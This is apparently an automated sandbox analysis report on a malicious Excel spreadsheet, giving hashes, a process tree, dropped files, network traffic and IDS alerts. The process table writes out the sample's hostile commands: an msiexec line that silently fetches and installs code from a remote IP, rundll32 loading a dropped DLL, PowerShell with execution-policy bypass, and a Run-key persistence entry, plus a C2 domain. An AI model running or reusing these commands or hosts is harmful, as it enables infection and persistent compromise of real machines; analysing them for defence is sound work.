Field | Value |
---|---|
File name | 19d278bfbe851f8d7599e9e682ccc0f77619b905.xls |
Full analysis | https://app.any.run/tasks/60a117f4-a55c-430f-a851-7150674788b2 |
Verdict | Malicious activity |
Analysis date | March 21, 2019, 17:15:01 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | application/vnd.ms-excel |
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Thu Mar 21 06:44:15 2019, Security: 0 |
MD5 | E5140EB52558797DBE9FAAB58C78C493 |
SHA1 | 19D278BFBE851F8D7599E9E682CCC0F77619B905 |
SHA256 | 63522E00181E6B8D9AE8BFD51F7DF8F8EBD0F42323E22047269DF9C7A71C9B6D |
SSDEEP | 1536:7Kpb8rGYrMPelwhKmFV5xtezEsgrdg8j/4q09wsRnyKinolB0IdludN7VaLyIc+V:7Kpb8rGYrMPelwhKmFV5xtezEsgrdgUI |
Detected type | .xls, Microsoft Excel sheet (78.9) |
Field | Value |
---|---|
Author | Microsoft Office |
LastModifiedBy | 1 |
Software | Microsoft Excel |
CreateDate | 2018:12:19 10:42:12 |
ModifyDate | 2019:03:21 06:44:15 |
Security | None |
CodePage | Windows Cyrillic |
Company | Microsoft Corporation |
AppVersion | 16 |
ScaleCrop | No |
LinksUpToDate | No |
SharedDoc | No |
HyperlinksChanged | No |
TitleOfParts | |
HeadingPairs | |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
688 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
1468 | msiexec.exe RETURN=185 /i http://169.239.128.104/alg /q ksw='%TEMP%' | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
3240 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
4060 | "C:\Windows\Installer\MSIA041.tmp" | C:\Windows\Installer\MSIA041.tmp | | msiexec.exe | User: admin; Company: hepsu burda; Integrity Level: MEDIUM; Description: hepsu burda Application; Version: 1.0.2.1 |
2724 | "C:\Users\admin\AppData\Local\Temp\nsbA179.tmp\nsA189.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Users\admin\AppData\Local\Temp\nsbA179.tmp\nsA189.tmp | — | MSIA041.tmp | User: admin; Integrity Level: MEDIUM |
3056 | "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Windows\system32\cmd.exe | — | nsA189.tmp | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3464 | rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Windows\system32\rundll32.exe | | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows host process (Rundll32); Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1456 | cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1 | C:\Windows\system32\cmd.exe | — | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2164 | powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2728 | cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /f | C:\Windows\system32\cmd.exe | — | rundll32.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
688 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8AF1.tmp.cvr | — | — | — |
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF4FC4E56F7B50CECE.TMP | — | — | — |
2164 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EXN7AX5EA6LHRYO9KBY6.temp | — | — | — |
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat | dat | D7A950FEFD60DBAA01DF2D85FEFB3862 | 75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A |
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | 8222CA92620FFB9E327874DE04FD8D85 | 7DB8F5F48713B41A2DEF0B6A086178365527D203325D1AC84D6437755859DB83 |
4060 | MSIA041.tmp | C:\Users\admin\AppData\Local\Temp\xmlparse.dll | executable | 6675C63A2534FD65B3B2DA751F2B393F | BEE3B2710F7E874CE05E6B8B45CC20E021B9C00EE337238598E71E7315128333 |
3240 | msiexec.exe | C:\Windows\Installer\MSI9774.tmp | executable | D4C11BDA021113CA4604D80896B2A492 | AE2B1B1F7265386EDBBF2617084F277CDB9BC5AC34BD9AAC00CBC77A6BDCD829 |
4060 | MSIA041.tmp | C:\Users\admin\AppData\Local\Temp\nsbA179.tmp\nsA189.tmp | executable | E2347A65B30CCC5B2C4230DAAEEFB897 | 79FD3041AB85E378839D2E3CF155FC91A2D541304D209F5D1D57AC7D791190EC |
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\F2U782LG\desktop.ini | ini | 4A3DEB274BB5F0212C2419D3D8D08612 | 2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 |
3240 | msiexec.exe | C:\Windows\Installer\MSI9F55.tmp | binary | 27EA1D34A855751F367D98CD10835CF5 | CDA0177A5E0FC56D8FCDCB139F054D539D0E36426D08385EFBDB087B0FEC1E64 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3240 | msiexec.exe | GET | 200 | 169.239.128.104:80 | http://169.239.128.104/alg | ZA | executable | 396 Kb | suspicious |
3464 | rundll32.exe | POST | 200 | 179.43.156.37:80 | http://cdnavupdate.icu/jquery/jquery.php | CH | text | 140 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3464 | rundll32.exe | 179.43.156.37:80 | cdnavupdate.icu | Private Layer INC | CH | suspicious |
3240 | msiexec.exe | 169.239.128.104:80 | — | Zappie Host LLC | ZA | suspicious |
Domain | IP | Reputation |
---|---|---|
cdnavupdate.icu | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3240 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3240 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
3464 | rundll32.exe | Potentially Bad Traffic | ET INFO HTTP POST Request to Suspicious *.icu domain |